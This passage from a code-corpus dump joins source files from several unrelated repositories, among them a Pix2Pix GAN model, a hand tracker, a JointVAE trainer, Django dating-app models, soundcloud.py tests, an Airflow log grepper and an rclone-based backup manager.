target_image = image[:,:511,:]
augmentations = config.both_transforms(image=input_image,image0=target_image)
input_image = augmentations["image"]
target_image = augmentations["image0"]
input_image = config.transform_input(image=input_image)["image"]
target_image = config.transform_mask(image=target_image)["image"]
return input_image,target_image
```
#### File: 7wikd/Pix2Pix-PyTorch/model.py
```python
import torch.nn as nn
import torch
class ConvBlock(nn.Module):
def __init__(self,in_features,out_features, use_dropout=False, isEncoder=True):
super(ConvBlock,self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(in_features, out_features, 4, 2, 1, bias=False, padding_mode='reflect')
if isEncoder
else nn.ConvTranspose2d(in_features, out_features, 4, 2, 1, bias=False),
nn.BatchNorm2d(out_features),
nn.LeakyReLU(0.2) if isEncoder else nn.ReLU(),
)
self.use_dropout = use_dropout
self.dropout = nn.Dropout(0.5)
self.isEncoder = isEncoder
def forward(self,x):
x = self.conv(x)
return self.dropout(x) if self.use_dropout else x
class Generator(nn.Module):
def __init__(self):
super().__init__()
self.e1 = nn.Sequential(
nn.Conv2d(3, 64, 4, 2, 1,padding_mode='reflect'),
nn.LeakyReLU(0.2),
)
self.e2 = ConvBlock(64, 128, isEncoder=True)
self.e3 = ConvBlock(128, 256, isEncoder=True)
self.e4 = ConvBlock(256, 512, isEncoder=True)
self.e5 = ConvBlock(512, 512, isEncoder=True)
self.e6 = ConvBlock(512, 512, isEncoder=True)
self.e7 = ConvBlock(512, 512, isEncoder=True)
self.bottleneck = nn.Sequential(
nn.Conv2d(512, 512, 4,2,1),
nn.ReLU(),
)
self.d1 = ConvBlock(512, 512, isEncoder=False, use_dropout=True)
self.d2 = ConvBlock(1024, 512, isEncoder=False, use_dropout=True)
self.d3 = ConvBlock(1024, 512, isEncoder=False, use_dropout=True)
self.d4 = ConvBlock(1024, 512, isEncoder=False)
self.d5 = ConvBlock(1024, 256, isEncoder=False)
self.d6 = ConvBlock(512, 128, isEncoder=False)
self.d7 = ConvBlock(256, 64, isEncoder=False)
self.d8 = nn.Sequential(
nn.ConvTranspose2d(128, 3, 4, 2, 1),
nn.Tanh(),
)
def forward(self,x):
down1 = self.e1(x)
down2 = self.e2(down1)
down3 = self.e3(down2)
down4 = self.e4(down3)
down5 = self.e5(down4)
down6 = self.e6(down5)
down7 = self.e7(down6)
bottleneck = self.bottleneck(down7)
up1 = self.d1(bottleneck)
up2 = self.d2(torch.cat([up1, down7], 1))
up3 = self.d3(torch.cat([up2, down6], 1))
up4 = self.d4(torch.cat([up3, down5], 1))
up5 = self.d5(torch.cat([up4, down4], 1))
up6 = self.d6(torch.cat([up5, down3], 1))
up7 = self.d7(torch.cat([up6, down2], 1))
return self.d8(torch.cat([up7, down1], 1))
class Block(nn.Module):
def __init__(self,in_features,out_features,stride):
super(Block,self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(in_features, out_features, 4, stride, 1,bias=False,padding_mode="reflect"),
nn.BatchNorm2d(out_features),
nn.LeakyReLU(0.2)
)
def forward(self,x):
return self.conv(x)
class Discriminator(nn.Module):
def __init__(self):
super().__init__()
self.initial = nn.Sequential(
nn.Conv2d(6, 64, 4, 2, 1, padding_mode="reflect"),
nn.LeakyReLU(0.2)
)
block1 = Block(64, 128, stride=2)
block2 = Block(128, 256, stride=2)
block3 = Block(256, 512, stride=1)
block4 = nn.Conv2d(512, 1, 4,stride=1,padding=1,padding_mode="reflect")
self.model = nn.Sequential(
block1,
block2,
block3,
block4
)
def forward(self,x,y):
x = torch.cat([x,y],1)
x = self.initial(x)
x = self.model(x)
return x
def disc_test():
x_disc = torch.randn((1, 3, 256, 256))
y_disc = torch.randn((1, 3, 256, 256))
model_disc = Discriminator()
preds_disc = model_disc(x_disc, y_disc)
print(f"====== Discriminator Model: ======= \n{model_disc}")
print(preds_disc.shape)
def gen_test():
x_gen = torch.randn((1, 3, 256, 256))
model_gen = Generator()
preds_gen = model_gen(x_gen)
print(f"====== Generator Model: ======= \n{model_gen}")
print(preds_gen.shape)
print("\n")
if __name__ == "__main__":
gen_test()
disc_test()
``` |
{
"source": "7wikd/Volume-Control",
"score": 3
} |
#### File: 7wikd/Volume-Control/handtracker_module.py
```python
import cv2
import mediapipe as mp
import time
'''
Hand Landmarks:
WRIST = 0
THUMB_CMC = 1
THUMB_MCP = 2
THUMB_IP = 3
THUMB_TIP = 4
INDEX_FINGER_MCP = 5
INDEX_FINGER_PIP = 6
INDEX_FINGER_DIP = 7
INDEX_FINGER_TIP = 8
MIDDLE_FINGER_MCP = 9
MIDDLE_FINGER_PIP = 10
MIDDLE_FINGER_DIP = 11
MIDDLE_FINGER_TIP = 12
RING_FINGER_MCP = 13
RING_FINGER_PIP = 14
RING_FINGER_DIP = 15
RING_FINGER_TIP = 16
PINKY_MCP = 17
PINKY_PIP = 18
PINKY_DIP = 19
PINKY_TIP = 20
'''
class handDetector():
def __init__(self,mode=False,maxHands=2,detectionConf=0.5,trackConf=0.5):
self.mode = mode
self.maxHands = maxHands
self.detectionConf = detectionConf
self.trackConf = trackConf
self.mpHands = mp.solutions.hands
self.hands = self.mpHands.Hands(self.mode, self.maxHands, self.detectionConf, self.trackConf)
self.mpDraw = mp.solutions.drawing_utils
def find_hands(self,img,draw = True):
imgRGB = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)
self.results = self.hands.process(imgRGB)
if self.results.multi_hand_landmarks:
for handLms in self.results.multi_hand_landmarks:
if draw:
self.mpDraw.draw_landmarks(img, handLms, self.mpHands.HAND_CONNECTIONS)
return img
def find_position(self,img, handnum=0, draw=True):
lmList = []
if self.results.multi_hand_landmarks:
handLms = self.results.multi_hand_landmarks[handnum]
for idx, lm in enumerate(handLms.landmark):
#print(idx,lm)
# rudimentary landmark tracker
h,w,c = img.shape
cx,cy = int(lm.x*w),int(lm.y*h)
lmList.append([idx,cx,cy])
if draw:
cv2.circle(img,(cx,cy),6,(255,0,255),cv2.FILLED)
return lmList
def main():
pTime = 0
cTime = 0
cap = cv2.VideoCapture(0)
detector = handDetector()
while True:
success, img = cap.read()
img = detector.find_hands(img)
mylist = detector.find_position(img)
if len(mylist) != 0:
print(mylist[3])
cTime = time.time()
fps = 1/(cTime-pTime)
pTime = cTime
cv2.putText(img,str(int(fps)),(10,70),cv2.FONT_HERSHEY_PLAIN,3,(255,255,0),3)
cv2.imshow("Image",img)
cv2.waitKey(1)
if __name__ == "__main__":
main()
``` |
{
"source": "7wik/joint-vae",
"score": 3
} |
#### File: joint-vae/jointvae/training.py
```python
import imageio
import numpy as np
import torch
from torch.nn import functional as F
from torchvision.utils import make_grid
EPS = 1e-12
class Trainer():
def __init__(self, model, optimizer, cont_capacity=None,
disc_capacity=None, print_loss_every=50, record_loss_every=5,
use_cuda=False):
"""
Class to handle training of model.
Parameters
----------
model : jointvae.models.VAE instance
optimizer : torch.optim.Optimizer instance
cont_capacity : tuple (float, float, int, float) or None
Tuple containing (min_capacity, max_capacity, num_iters, gamma_z).
Parameters to control the capacity of the continuous latent
channels. Cannot be None if model.is_continuous is True.
disc_capacity : tuple (float, float, int, float) or None
Tuple containing (min_capacity, max_capacity, num_iters, gamma_c).
Parameters to control the capacity of the discrete latent channels.
Cannot be None if model.is_discrete is True.
print_loss_every : int
Frequency with which loss is printed during training.
record_loss_every : int
Frequency with which loss is recorded during training.
use_cuda : bool
If True moves model and training to GPU.
"""
self.model = model
self.optimizer = optimizer
self.cont_capacity = cont_capacity
self.disc_capacity = disc_capacity
self.print_loss_every = print_loss_every
self.record_loss_every = record_loss_every
self.use_cuda = use_cuda
if self.model.is_continuous and self.cont_capacity is None:
raise RuntimeError("Model is continuous but cont_capacity not provided.")
if self.model.is_discrete and self.disc_capacity is None:
raise RuntimeError("Model is discrete but disc_capacity not provided.")
if self.use_cuda:
self.model.cuda()
# Initialize attributes
self.num_steps = 0
self.batch_size = None
self.losses = {'loss': [],
'recon_loss': [],
'kl_loss': []}
# Keep track of divergence values for each latent variable
if self.model.is_continuous:
self.losses['kl_loss_cont'] = []
# For every dimension of continuous latent variables
for i in range(self.model.latent_spec['cont']):
self.losses['kl_loss_cont_' + str(i)] = []
if self.model.is_discrete:
self.losses['kl_loss_disc'] = []
# For every discrete latent variable
for i in range(len(self.model.latent_spec['disc'])):
self.losses['kl_loss_disc_' + str(i)] = []
def train(self, data_loader, epochs=10, save_training_gif=None):
"""
Trains the model.
Parameters
----------
data_loader : torch.utils.data.DataLoader
epochs : int
Number of epochs to train the model for.
save_training_gif : None or tuple (string, Visualizer instance)
If not None, will use visualizer object to create image of samples
after every epoch and will save gif of these at location specified
by string. Note that string should end with '.gif'.
"""
if save_training_gif is not None:
training_progress_images = []
self.batch_size = data_loader.batch_size
self.model.train()
for epoch in range(epochs):
mean_epoch_loss = self._train_epoch(data_loader)
print('Epoch: {} Average loss: {:.2f}'.format(epoch + 1,
self.batch_size * self.model.num_pixels * mean_epoch_loss))
if save_training_gif is not None:
# Generate batch of images and convert to grid
viz = save_training_gif[1]
viz.save_images = False
img_grid = viz.all_latent_traversals(size=10)
# Convert to numpy and transpose axes to fit imageio convention
# i.e. (width, height, channels)
img_grid = np.transpose(img_grid.numpy(), (1, 2, 0))
# Add image grid to training progress
training_progress_images.append(img_grid)
if save_training_gif is not None:
imageio.mimsave(save_training_gif[0], training_progress_images,
fps=24)
def _train_epoch(self, data_loader):
"""
Trains the model for one epoch.
Parameters
----------
data_loader : torch.utils.data.DataLoader
"""
epoch_loss = 0.
print_every_loss = 0. # Keeps track of loss to print every
# self.print_loss_every
for batch_idx, (data, label) in enumerate(data_loader):
iter_loss = self._train_iteration(data)
epoch_loss += iter_loss
print_every_loss += iter_loss
# Print loss info every self.print_loss_every iteration
if batch_idx % self.print_loss_every == 0:
if batch_idx == 0:
mean_loss = print_every_loss
else:
mean_loss = print_every_loss / self.print_loss_every
print('{}/{}\tLoss: {:.3f}'.format(batch_idx * len(data),
len(data_loader.dataset),
self.model.num_pixels * mean_loss))
print_every_loss = 0.
# Return mean epoch loss
return epoch_loss / len(data_loader.dataset)
def _train_iteration(self, data):
"""
Trains the model for one iteration on a batch of data.
Parameters
----------
data : torch.Tensor
A batch of data. Shape (N, C, H, W)
"""
self.num_steps += 1
if self.use_cuda:
data = data.cuda()
self.optimizer.zero_grad()
recon_batch, latent_dist = self.model(data)
loss = self._loss_function(data, recon_batch, latent_dist)
loss.backward()
self.optimizer.step()
train_loss = loss.item()
return train_loss
def _loss_function(self, data, recon_data, latent_dist):
"""
Calculates loss for a batch of data.
Parameters
----------
data : torch.Tensor
Input data (e.g. batch of images). Should have shape (N, C, H, W)
recon_data : torch.Tensor
Reconstructed data. Should have shape (N, C, H, W)
latent_dist : dict
Dict with keys 'cont' or 'disc' or both containing the parameters
of the latent distributions as values.
"""
# Reconstruction loss is pixel wise cross-entropy
recon_loss = F.binary_cross_entropy(recon_data.view(-1, self.model.num_pixels),
data.view(-1, self.model.num_pixels))
# F.binary_cross_entropy takes mean over pixels, so unnormalise this
recon_loss *= self.model.num_pixels
# Calculate KL divergences
kl_cont_loss = 0 # Used to compute capacity loss (but not a loss in itself)
kl_disc_loss = 0 # Used to compute capacity loss (but not a loss in itself)
cont_capacity_loss = 0
disc_capacity_loss = 0
if self.model.is_continuous:
# Calculate KL divergence
mean, logvar = latent_dist['cont']
kl_cont_loss = self._kl_normal_loss(mean, logvar)
# Linearly increase capacity of continuous channels
cont_min, cont_max, cont_num_iters, cont_gamma = \
self.cont_capacity
# Increase continuous capacity without exceeding cont_max
cont_cap_current = (cont_max - cont_min) * self.num_steps / float(cont_num_iters) + cont_min
cont_cap_current = min(cont_cap_current, cont_max)
# Calculate continuous capacity loss
cont_capacity_loss = cont_gamma * torch.abs(cont_cap_current - kl_cont_loss)
if self.model.is_discrete:
# Calculate KL divergence
kl_disc_loss = self._kl_multiple_discrete_loss(latent_dist['disc'])
# Linearly increase capacity of discrete channels
disc_min, disc_max, disc_num_iters, disc_gamma = \
self.disc_capacity
# Increase discrete capacity without exceeding disc_max or theoretical
# maximum (i.e. sum of log of dimension of each discrete variable)
disc_cap_current = (disc_max - disc_min) * self.num_steps / float(disc_num_iters) + disc_min
disc_cap_current = min(disc_cap_current, disc_max)
# Require float conversion here to not end up with numpy float
disc_theoretical_max = sum([float(np.log(disc_dim)) for disc_dim in self.model.latent_spec['disc']])
disc_cap_current = min(disc_cap_current, disc_theoretical_max)
# Calculate discrete capacity loss
disc_capacity_loss = disc_gamma * torch.abs(disc_cap_current - kl_disc_loss)
# Calculate total kl value to record it
kl_loss = kl_cont_loss + kl_disc_loss
# Calculate total loss
total_loss = recon_loss + cont_capacity_loss + disc_capacity_loss
# Record losses
if self.model.training and self.num_steps % self.record_loss_every == 1:
self.losses['recon_loss'].append(recon_loss.item())
self.losses['kl_loss'].append(kl_loss.item())
self.losses['loss'].append(total_loss.item())
# To avoid large losses normalise by number of pixels
return total_loss / self.model.num_pixels
def _kl_normal_loss(self, mean, logvar):
"""
Calculates the KL divergence between a normal distribution with
diagonal covariance and a unit normal distribution.
Parameters
----------
mean : torch.Tensor
Mean of the normal distribution. Shape (N, D) where D is dimension
of distribution.
logvar : torch.Tensor
Diagonal log variance of the normal distribution. Shape (N, D)
"""
# Calculate KL divergence
kl_values = -0.5 * (1 + logvar - mean.pow(2) - logvar.exp())
# Mean KL divergence across batch for each latent variable
kl_means = torch.mean(kl_values, dim=0)
# KL loss is sum of mean KL of each latent variable
kl_loss = torch.sum(kl_means)
# Record losses
if self.model.training and self.num_steps % self.record_loss_every == 1:
self.losses['kl_loss_cont'].append(kl_loss.item())
for i in range(self.model.latent_spec['cont']):
self.losses['kl_loss_cont_' + str(i)].append(kl_means[i].item())
return kl_loss
def _kl_multiple_discrete_loss(self, alphas):
"""
Calculates the KL divergence between a set of categorical distributions
and a set of uniform categorical distributions.
Parameters
----------
alphas : list
List of the alpha parameters of a categorical (or gumbel-softmax)
distribution. For example, if the categorical atent distribution of
the model has dimensions [2, 5, 10] then alphas will contain 3
torch.Tensor instances with the parameters for each of
the distributions. Each of these will have shape (N, D).
"""
# Calculate kl losses for each discrete latent
kl_losses = [self._kl_discrete_loss(alpha) for alpha in alphas]
# Total loss is sum of kl loss for each discrete latent
kl_loss = torch.sum(torch.cat(kl_losses))
# Record losses
if self.model.training and self.num_steps % self.record_loss_every == 1:
self.losses['kl_loss_disc'].append(kl_loss.item())
for i in range(len(alphas)):
self.losses['kl_loss_disc_' + str(i)].append(kl_losses[i].item())
return kl_loss
def _kl_discrete_loss(self, alpha):
"""
Calculates the KL divergence between a categorical distribution and a
uniform categorical distribution.
Parameters
----------
alpha : torch.Tensor
Parameters of the categorical or gumbel-softmax distribution.
Shape (N, D)
"""
disc_dim = int(alpha.size()[-1])
log_dim = torch.Tensor([np.log(disc_dim)])
if self.use_cuda:
log_dim = log_dim.cuda()
# Calculate negative entropy of each row
neg_entropy = torch.sum(alpha * torch.log(alpha + EPS), dim=1)
# Take mean of negative entropy across batch
mean_neg_entropy = torch.mean(neg_entropy, dim=0)
# KL loss of alpha with uniform categorical variable
kl_loss = log_dim + mean_neg_entropy
return kl_loss
``` |
{
"source": "7workday/TT",
"score": 3
} |
#### File: TT/common/stat.py
```python
OK = 0
class LogicErr(Exception):
code = None
data = None
def __init__(self,data=None):
self.data = data or self.__class__.__name__ # 如果 data 为 None, 使用类的名字作为 data 值
def gen_logic_err(name, code):
'''生成一个新的 LogicErr 的子类 (LogicErr 的工厂函数)'''
return type(name, (LogicErr,), {'code': code})
SmsErr = gen_logic_err('SmsErr', 1000) # 短信发送失败
VcodeErr = gen_logic_err('VcodeErr', 1001) # 验证码错误
LoginRequired = gen_logic_err('LoginRequired', 1002) # 用户未登录
UserFormErr = gen_logic_err('UserFormErr', 1003) # 用户表单数据错误
ProfileFormErr = gen_logic_err('ProfileFormErr', 1004) # 用户资料表单错误
RepeatSwipeErr = gen_logic_err('RepeatSwipeErr', 1005) # 重复滑动的错误
AreadyFriends = gen_logic_err('AreadyFriends',1006) # 重复好友
RewindLimited = gen_logic_err('RewindLimited',1007) #当天反悔次数达到上线
RewindTimeout = gen_logic_err('RewindTimeout',1008) #反悔超时
PermRequired = gen_logic_err('PermRequired',1009) #缺少某种权限
```
#### File: TT/social/models.py
```python
from django.db import models
from django.db.models import Q
from sqlite3 import IntegrityError
from common import stat
class Swiped(models.Model):
'''滑动记录'''
STYPES = (
('like', '右滑'),
('superlike', '上滑'),
('dislike', '左滑'),
)
uid = models.IntegerField(verbose_name='用户 ID')
sid = models.IntegerField(verbose_name='被滑动用户的 ID')
stype = models.CharField(max_length=10, choices=STYPES, verbose_name='滑动的类型')
stime = models.DateTimeField(auto_now_add=True, verbose_name='滑动的时间')
class Meta:
unique_together = ('uid', 'sid') # uid 与 sid 联合唯一
@classmethod
def swiper(cls, self, uid, sid, styple):
'''执行一次滑动'''
try:
return cls.objects.create(uid=uid, sid=sid, style='like')
except IntegrityError:
raise stat.RepeatSwipeErr
@classmethod
def has_liked(cls, uid, sid):
'''检查是否喜欢过某人'''
return cls.objects.filter(uid=uid, sid=sid , stype__in=['like','superlike']).exists()
class Friend(models.Model):
'''好友表'''
uid1 = models.IntegerField(verbose_name='用户 ID')
uid2 = models.IntegerField(verbose_name='用户 ID')
class Meta:
unique_together = ('uid1', 'uid2') # uid1 与 uid2 联合唯一
@classmethod
def make_friends(cls, uid1, uid2):
'''添加好友关系'''
# 调整 uid1 和 uid2 的顺序,小的值放前面
uid1,uid2 = (uid2,uid1)if uid1>uid2 else (uid1,uid2)
try:
return cls.objects.create(uid1=uid1,uid2=uid2)
except IntegrityError:
raise stat.AreadyFriends
@classmethod
def break_off(cls,uid1,uid2):
'''绝交'''
# 调整 uid1 和 uid2 的顺序,小的值放前面
uid1, uid2 = (uid2, uid1) if uid1 > uid2 else (uid1, uid2)
cls.objects.filter(uid1=uid1,uid2=uid2).delete()
@classmethod
def get_my_friends_id(cls, uid):
'''获取用户自己的好友 ID 列表'''
query_condition = Q(uid1=uid) | Q(uid2=uid)
friendship = cls.objects.filter(query_condition)
# 取出所有好友的 UID
friend_id_list = []
for f_obj in friendship:
if f_obj.uid1 == uid:
friend_id_list.append(f_obj.uid2)
else:
friend_id_list.append(f_obj.uid1)
return friend_id_list
``` |
{
"source": "7ws/python-crystalball",
"score": 3
} |
#### File: python-crystalball/crystalball/parser.py
```python
import re
RE_JSON_KEY = re.compile(r'''
"(?P<key>[^"]*)" # Key
:\s* # Separator
# "(?P<value>(?:\"|.)*?)"
"(?P<value>[^"]*)" # Value
''', re.X)
class Parser:
"""
The main parser class
"""
def __init__(self, content):
"""
Build a catalog of useful data from content
"""
# Collect results extracted as JSON
self._json_cache = [
match.groups()
for match in RE_JSON_KEY.finditer(content)
]
def first(self, key):
"""
Find the first occurence of "key"
"""
# Look through the JSON cache
for name, value in self._json_cache:
if key == name:
return value
# Exhaustion
else:
return None
``` |
{
"source": "7x11x13/soundcloud.py",
"score": 3
} |
#### File: soundcloud/resource/base_item.py
```python
import datetime
from dataclasses import dataclass
from typing import List, Optional
from soundcloud.resource.base import BaseData
from soundcloud.resource.user import BasicUser
@dataclass
class BaseItem(BaseData):
artwork_url: Optional[str]
created_at: datetime.datetime
description: Optional[str]
duration: int
embeddable_by: str
genre: Optional[str]
id: int
kind: str
label_name: Optional[str]
last_modified: datetime.datetime
licence: Optional[str]
likes_count: Optional[int]
permalink: str
permalink_url: str
public: bool
purchase_title: Optional[str]
purchase_url: Optional[str]
release_date: Optional[str]
reposts_count: Optional[int]
secret_token: Optional[str]
sharing: str
tag_list: str
title: str
uri: str
user_id: int
display_date: str
def get_all_tags(self) -> List[str]:
tags = []
if self.genre:
tags.append(self.genre)
return tags + [tag.strip() for tag in self.tag_list.split('"') if tag.strip()]
```
#### File: soundcloud.py/tests/test_playlist.py
```python
from soundcloud import SoundCloud, BasicAlbumPlaylist
def test_get_playlist(client: SoundCloud):
playlist = client.get_playlist(1326192094)
assert isinstance(playlist, BasicAlbumPlaylist) and playlist.user.username == "7x11x13-testing"
def test_playlist_likers(client: SoundCloud):
likers = client.get_playlist_likers(1326192094)
found = False
for liker in likers:
if liker.username == "7x11x13":
found = True
break
assert found
def test_playlist_reposters(client: SoundCloud):
reposters = client.get_playlist_reposters(1326720835)
found = False
for reposter in reposters:
if reposter.username == "7x11x13":
found = True
break
assert found
```
#### File: soundcloud.py/tests/test_user.py
```python
import itertools
from soundcloud import SoundCloud, User
def test_valid_user_id(client: SoundCloud):
user = client.get_user(790976431)
assert isinstance(user, User) and user.permalink == "7x11x13"
def test_invalid_user_id(client: SoundCloud):
user = client.get_user("0")
assert user is None
def test_valid_username(client: SoundCloud):
user = client.get_user_by_username("7x11x13")
assert isinstance(user, User) and user.permalink == "7x11x13"
def test_invalid_username(client: SoundCloud):
user = client.get_user_by_username("")
assert user is None
def test_user_comments(client: SoundCloud):
comment = next(client.get_user_comments(992430331))
assert comment.body == "hi"
def test_user_conversation_messages(client: SoundCloud):
message = next(client.get_conversation_messages(790976431, 992430331))
assert message.content == "bye"
def test_user_conversations(client: SoundCloud):
found = False
for conversation in client.get_conversations(790976431):
if conversation.last_message.content == "bye":
found = True
assert found
def test_user_followers(client: SoundCloud):
found = False
for follower in client.get_user_followers(992430331):
if follower.permalink == "7x11x13":
found = True
break
assert found
def test_user_followings(client: SoundCloud):
following = next(client.get_user_following(992430331))
assert following.permalink == "7x11x13"
def test_user_likes(client: SoundCloud):
like = next(client.get_user_likes(992430331))
assert like.track.title == "Wan Bushi - Eurodance Vibes (part 1+2+3)"
def test_user_likes_2(client: SoundCloud):
for like in itertools.islice(client.get_user_likes(790976431), 10):
assert like is not None
def test_user_reposts(client: SoundCloud):
repost = next(client.get_user_reposts(992430331))
assert repost.track.title == "Wan Bushi - Eurodance Vibes (part 1+2+3)"
def test_user_tracks(client: SoundCloud):
tracks = list(client.get_user_tracks(790976431))
assert tracks[-1].title == "Wan Bushi - Eurodance Vibes (part 1+2+3)"
def test_user_toptracks(client: SoundCloud):
tracks = list(client.get_user_popular_tracks(790976431))
assert tracks[0].title == "Wan Bushi - Eurodance Vibes (part 1+2+3)"
def test_user_albums(client: SoundCloud):
found = False
for album in client.get_user_albums(211111464):
if album.title == "Positions":
found = True
break
assert found
def test_user_playlists(client: SoundCloud):
assert next(client.get_user_playlists(992430331)).title == "playlist1"
def test_user_links(client: SoundCloud):
user = client.get_user(992430331)
profiles = client.get_user_links(user.urn)
assert profiles[0].title == "test"
``` |
{
"source": "7yl4r/airflow_log_grepper",
"score": 2
} |
#### File: airflow_log_grepper/airflow_log_grepper/log_grepper.py
```python
import os
import re
import sys
import operator
import pprint
from glob import glob
import json
pp = pprint.PrettyPrinter(indent=4)
logdir = "/home/airflow/logs"
def matchwalk_re(regex, directory):
'''Yield path/filenames matching some regular expression
from https://stackoverflow.com/a/49681926/1483986
'''
sep = os.path.sep
pattern = re.compile(regex)
for p, _, f in os.walk(directory):
for i in range(len(f)):
if pattern.search(os.path.join(p, f[i])):
yield '{0}{1}{2}'.format(p, sep, f[i])
# else:
# print(p)
def get_logfiles(base_log_path, dag_glob, task_glob):
"""
Returns iterator of files in airflow DAG log directory.
Expects dir structure like:
/logs/dag_id/task_id/{task_instance_dt}/{n}.log
"""
full_glob = "{}/{}/{}/*/*.log".format(
base_log_path, dag_glob, task_glob
)
print("grepping logs matching glob :\n\t{}".format(full_glob))
for log_path in glob(full_glob):
yield log_path
def get_greps_from_config_json(json_config_fpath):
"""
json config file should be named with a filename like `${dag_glob}.json`
and look like:
{
"task_glob_1": [
{
"match_key_1": "string to grep for #1",
"match_key_2": "other string to grep for"
}
],
"task_glob_2": [{...}]
}
"""
# DAG glob comes from filename
dag_glob = os.path.basename(json_config_fpath).replace(".json", "")
with open(json_config_fpath) as json_file:
greps_by_task_globs_dict = json.load(json_file)
return dag_glob, greps_by_task_globs_dict
def progressbar(it, prefix="", size=60, file=sys.stdout):
"""
ASCII progress bar based on https://stackoverflow.com/a/34482761/1483986
"""
count = len(it)
def show(j):
try:
x = int(size*j/count)
except ZeroDivisionError:
x = count
file.write(
"%s[%s%s] %i/%i\r" % (prefix, "#"*x, "."*(size-x), j, count)
)
file.flush()
show(0)
for i, item in enumerate(it):
yield item
show(i+1)
file.write("\n")
file.flush()
def get_grepped_log_counts(greps_json_file, base_log_path):
"""
returns sorted dict of counts for all log classifications
"""
dag_glob, greps_by_task_globs = get_greps_from_config_json(greps_json_file)
counts = {}
# iterate over each task
print("{} tasks glob strings found".format(len(greps_by_task_globs)))
never_matched_files = []
for task_glob, greps in greps_by_task_globs.items():
print("\t{}".format(task_glob))
# import pdb; pdb.set_trace()
for key, strin in list(greps.items()):
assert key not in counts # no duplicate keys!
counts[key] = 0
counts['success'] = 0
counts['unmatched'] = 0
print("{} grep strings for this task glob".format(len(greps)))
# search this task's logfiles
unmatched_files = []
log_files = list(get_logfiles(base_log_path, dag_glob, task_glob))
for i in progressbar(range(len(log_files))):
file = log_files[i]
# grep the file for strings
# print(files) #entry.name)
matches = []
fstr = open(file).read()
# special case for successful run:
if fstr.strip().endswith("Command exited with return code 0"):
counts['success'] += 1
matches.append('success')
for grep_key, grep_str in list(greps.items()):
if grep_str in open(file).read():
counts[grep_key] += 1
matches.append(grep_key)
# print(grep_key)
if len(matches) == 1:
pass
elif len(matches) > 1:
# print('ERR: multiple matches!:{}'.format(matches))
# print(file)
for key in matches:
counts[key] -= 1
multimatch_key = '_AND_'.join(matches)
counts[multimatch_key] = counts.get(multimatch_key, 0) + 1
else: # matches < 1:
unmatched_files.append(file.replace(base_log_path, ""))
else:
# keep unmatched_files from this search & previous
never_matched_files.extend(
unmatched_files
)
if len(never_matched_files) > 0:
print("{} UNMATCHED files! First 10:".format(
len(never_matched_files)
))
pp.pprint(never_matched_files[:10])
counts['unmatched'] = len(never_matched_files)
print("\n" + "-"*100)
sorted_counts = sorted(counts.items(), key=operator.itemgetter(1))
pp.pprint(sorted_counts)
return sorted_counts
``` |
{
"source": "7yl4r/backdat",
"score": 3
} |
#### File: backdat/backdat/BackupManager.py
```python
from datetime import datetime, timedelta
import logging
from croniter import croniter
from backdat.RemoteInterface import rclone
from backdat.file_parsers import backup_plan, host_settings
from backdat.file_parsers import crontab
from backdat.file_parsers import backup_history
from backdat.file_parsers import backup_stats
from backdat.util.get_hostname import get_hostname
from backdat.planners.util import make_plan_line
from backdat.planners.dumbplan import make_plan
class BackupArgs(object):
""" basically a dict to pass to the back up driver (RemoteInterface)...
why didn't I just use a dict?
"""
source = "/opt/backdat/backdat.py"
target = "gdrive-ty:/IMARS/backups/test/"
backuper_log = "/var/opt/backdat/backup.log"
summarylog = "/var/opt/backdat/summary.log"
rclonelog = None
window = str(24*30*9)+"h"
verbose = 0
def get_plan_line(self):
"""
convert BackupManger.BackupArgs object into string matching the
format of a line in backup_plan.tsv
"""
time_string = "2222-22-22T22:22:22" # TODO: somehow use real time here?
return make_plan_line(time_string, get_hostname() + ":" + self.source, self.target)
class BackupManager(object):
""" BackupManager manages backing up of files in a backup session """
def __init__(self):
self.next_backup_args = BackupArgs()
self.logger = logging.getLogger(__name__)
def start_backups(self):
"""
starts running backups until we are outside of our allotted window
"""
self.logger.info(" === START === ")
try:
hostname = get_hostname()
for next_backup in backup_plan.read(hostname):
self.logger.debug(".")
self.set_next_backup(next_backup)
if (BackupManager.enough_time_remaining()):
self.do_next_backup()
else:
self.logger.info("Not within backup window.")
break
else:
self.logger.warn("Finished all backups with time to spare!")
# re-plan?
make_plan()
# schedule next run of BackupManager in crontab & exit
finally:
winend, next_scheduled_time = BackupManager.get_window_edges(
BackupManager.get_host_setting(host_settings.KEYS.BACKUP_TIMES)
)
crontab.write_crontab(next_scheduled_time)
# TODO: update backup plan before exiting
self.logger.info(" === END === ")
def do_next_backup(self):
"""
do the next backup action
"""
self.logger.info("starting next backup action...")
try:
rclone.backup(self.next_backup_args)
status = backup_stats.ACTION_STATUS.DONE
backup_history.log_backup_action(self.next_backup_args)
except Exception as err:
self.logger.error("backup action failed!", err)
status = backup_stats.ACTION_STATUS.FAIL
finally:
backup_stats.update_stats(
self.next_backup_args,
status
)
backup_plan.remove_action(self.next_backup_args)
def set_next_backup(self, backup_dict):
""" loads given backup dict into next_backup_args """
self.logger.debug(backup_dict["source"] + "\n\t=> " + backup_dict["target"])
self.next_backup_args.source = backup_dict["source"]
self.next_backup_args.target = backup_dict["target"]
@staticmethod
def get_host_setting(key):
settings = host_settings.read()
return settings[key]
@staticmethod
def enough_time_remaining():
"""
return true if we have enough time left in the window to complete
the next backup task
"""
estimated_next_backup_tf = datetime.now() + timedelta(minutes=5)
# NOTE: could calc better estimate
return BackupManager.inside_cron_window(
estimated_next_backup_tf,
BackupManager.get_host_setting(host_settings.KEYS.BACKUP_TIMES)
)
@staticmethod
def inside_cron_window(dtime, windowstr):
"""
returns true if given datetime is within given widow cron string
---------
dtime : datetime
windowstr : str
"""
logger = logging.getLogger(__file__)
window_end, next_window = BackupManager.get_window_edges(windowstr)
if dtime < window_end:
logger.debug(str(dtime) + " is inside the window")
return True
else:
logger.debug(str(dtime) + " is after end of window")
return False
@staticmethod
def get_window_edges( windowstr, MAX_DELTA=timedelta(hours=25)):
"""
Returns datetime of the end current backup window
and the datetime of the start of the next window.
Assumes the window is smaller than MAX_DELTA.
Parameters
----------------
windowstr : crontab-like str
the window to explore
MAX_DELTA : datetime.timedelta
max time in future to check for the window before giving up
and assuming the window is infinite
"""
logger = logging.getLogger(__file__)
def _max_window_edges():
""" use this when the window looks infinite """
return datetime.max, datetime.now() + timedelta(hours=1)
if windowstr == "* * * * *":
logger.warn("Attempting to calculate edge of infinite window!")
return _max_window_edges()
else:
time_to_give_up = datetime.now() + MAX_DELTA
last_time = datetime.now()
